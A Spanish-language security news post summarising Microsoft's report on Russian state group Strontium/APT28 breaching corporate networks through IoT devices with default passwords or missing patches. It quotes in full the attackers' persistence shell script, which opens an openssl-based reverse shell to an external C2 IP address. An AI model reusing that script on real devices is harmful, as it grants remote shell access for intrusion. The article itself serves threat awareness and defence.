Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon Microsoft descubre hackers rusos que utilizan dispositivos IoT para penetrar en redes


Supuestamente hackers que trabajan para el gobierno ruso han estado utilizando impresoras, decodificadores de video y otros dispositivos llamados de la Internet de las cosas (IoT) para penetrar en las redes informáticas específicas, informó Microsoft Security Response Center. Los investigadores de Microsoft descubrieron los ataques en abril, cuando un teléfono de voz sobre IP, una impresora de oficina y un decodificador de video en múltiples ubicaciones se comunicaban con servidores pertenecientes a "Strontium", un grupo de piratería del gobierno ruso




Se estima que para el año 2020 se desplegarán unos 50 mil millones de dispositivos IoT en todo el mundo. Los dispositivos IoT están diseñados a propósito para conectarse a una red y muchos simplemente están conectados a Internet con poca administración o supervisión. Dichos dispositivos aún deben ser identificables, mantenidos y monitoreados por equipos de seguridad, especialmente en grandes empresas complejas.

En 2016, el grupo de investigación de malware MalwareMustDie descubrió la botnet Mirai. La botnet inicialmente consistía en cámaras IP y routers domésticos básicos, dos tipos de dispositivos IoT que se encuentran comúnmente en el hogar. A medida que surgieron más variantes de Mirai, también surgió la lista de dispositivos IoT a los que apuntaba. El código fuente del malware que alimenta esta botnet finalmente se filtró en línea.

En 2018, cientos de miles de dispositivos de red y almacenamiento para el hogar y PyMEs se vieron comprometidos con el denominado malware VPN Filter. El FBI ha atribuido públicamente esta actividad a un actor de un estado-nación y tomó medidas posteriores para interrumpir esta red de bots, aunque los dispositivos seguirían siendo vulnerables a la reinfección a menos que el usuario establezca los controles de seguridad o firmware adecuados.

Dispositivos de IoT: fuentes de inseguridad constantes

En abril, investigadores de seguridad del Centro de Inteligencia de Amenazas de Microsoft descubrieron la infraestructura de un adversario conocido como STRONTIUM que se comunicaba con varios dispositivos externos. Investigaciones posteriores descubrieron intentos para comprometer dispositivos IoT populares (un teléfono VOIP, una impresora de oficina y un decodificador de video) en múltiples ubicaciones de clientes. La investigación descubrió que un atacante había usado estos dispositivos para obtener acceso inicial a las redes corporativas. En dos de los casos, los dispositivos se implementaron sin cambiar las contraseñas predeterminadas del fabricante y, en tercera instancia, la última actualización de seguridad no se había aplicado al dispositivo.

Estos dispositivos se convirtieron en puntos de entrada desde los cuales el actor estableció una presencia en la red y continuó buscando un mayor acceso. Una vez que el actor había establecido con éxito el acceso a la red, un simple escaneo de la red para buscar otros dispositivos inseguros les permitió descubrir y moverse a través de la red en busca de cuentas con mayores privilegios que otorgarían acceso a datos de mayor valor. Después de obtener acceso a cada uno de los dispositivos IoT, el actor ejecutó tcpdump para detectar el tráfico de red en subredes locales.

También se les vio enumerando grupos administrativos para intentar una mayor explotación. A medida que el actor se movía de un dispositivo a otro, soltaban un simple script de shell para establecer la persistencia en la red, lo que permitía un acceso extendido para continuar la caza. El análisis del tráfico de red mostró que los dispositivos también se comunicaban con un servidor externo de comando y control (C2).

Script usado para mantener la persistencia.

—contents of [IOT Device] file-- 
#!/bin/sh
export [IOT Device] ="-qws -display :1 -nomouse"
echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443  while : ; do sh && break; done openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' & 
--end contents of file--

Strontium / Fancy Bear / APT28


En los últimos doce meses, Microsoft ha entregado cerca de 1.400 notificaciones de estado-nación a aquellos que han sido atacados o comprometidos por Strontium / Fancy Bear / APT28. Una de cada cinco notificaciones de actividad de Strontium estaba vinculada a ataques contra organizaciones no gubernamentales, grupos de expertos u organizaciones políticamente afiliadas en todo el mundo. El 80% restante de los ataques de Strontium se han dirigido principalmente a organizaciones en los siguientes sectores: gobierno, informática, militar, defensa, medicina, educación e ingeniería. También se ha observado y notificado los ataques de Strontium contra los comités organizadores olímpicos, las agencias antidopaje y la industria hotelera.

Strontium está relacionado a uno de los grupos de hacking de élite patrocinados por el estado de Rusia como una forma de violar redes corporativas, desde donde pivotan a otros objetivos de mayor valor. Este grupo ha estado involucrado previamente en el ataque de DNC de 2016 y que, según una acusación presentada en 2018 por funcionarios estadounidenses, ha sido identificado como la Unidad 26165 y la Unidad 74455 de la agencia de inteligencia militar rusa GRU.

Pero además de Strontium, otros grupos patrocinados por el estado también han comenzado a apuntar a dispositivos IoT, y principalmente a routers. Los ejemplos incluyen los grupos LuckyMouse, Inception Framework, y Slingshot.

Es necesario para crear conciencia sobre estos riesgos en toda la industria y pedimos una mejor integración empresarial de los dispositivos IoT, particularmente la capacidad de monitorear la telemetría de dispositivos IoT dentro de las redes empresariales. Hoy, la cantidad de dispositivos IoT implementados supera en número a la población de computadoras personales y teléfonos móviles, combinados. Con cada dispositivo IoT en red que tiene su propia pila de red separada, es bastante fácil ver la necesidad de una mejor gestión empresarial, especialmente en el mundo actual de "traiga su propio dispositivo".


Fuentes:
https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.